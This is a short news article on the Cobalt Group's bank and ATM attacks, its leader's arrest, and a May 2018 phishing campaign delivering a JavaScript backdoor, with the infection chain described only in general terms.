Cobalt group still active despite losing it's ringleader.
Cobalt Group, the hacking group behind widespread attacks on banks and ATM jackpotting campaigns across Europe, is still, despite the arrest of its accused ringleader in March. The Cobalt Group, first gained noteriety in 2016. The group stole the equivalent of over $32,000 from six ATMs in Eastern Europe in one night. Throughout 2017 the group expanded its focus to financial sector phishing schemes and new regions, including North and South America, as well as Western Europe. researchers estimate that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries. The report is notable since the Spanish National Police arrested the Cobalt Group's leader on March 26. EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.
In a report released last week, researchers found that in mid-May 2018,they detected a phishing campaign directed at the financial sector that has an ultimate goal of downloading a JavaScript backdoor on victims' computers. Researchers discovered the backdoor to be loaded up with malicious functions, including cyberespionage and the ability to launch programs, ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. It's capabilities mirror the backdoor that Cobalt Group has been known to employ in the past
Cobalt usually uses a number of techniques to evade user suspicion and spam filters. The group hacks poorlh protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, mules collect cash from the hacked ATMs. The new May attaacks all have of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the hacking group. These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word generated by the Threadkit exploit kit. This kill chain is the same as that of a Cobalt Group campaign detected in February.
Cobalt relies on social engineering for the first stage of attacks since almost 30 percent of recipients click links in phishing messages. Hackers are able to draw employees into correspondence, including security staff. If a message is sent from the address of a real company, the success rate jumps to 33 percent. Researchers think that once one of the exploits are triggered, a BAT script runs that launches a standard Windows utility that allows bypassing AppLocker, as well as downloading and running SCT or COM objects using the standard Windows utility regsvr32.exe. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.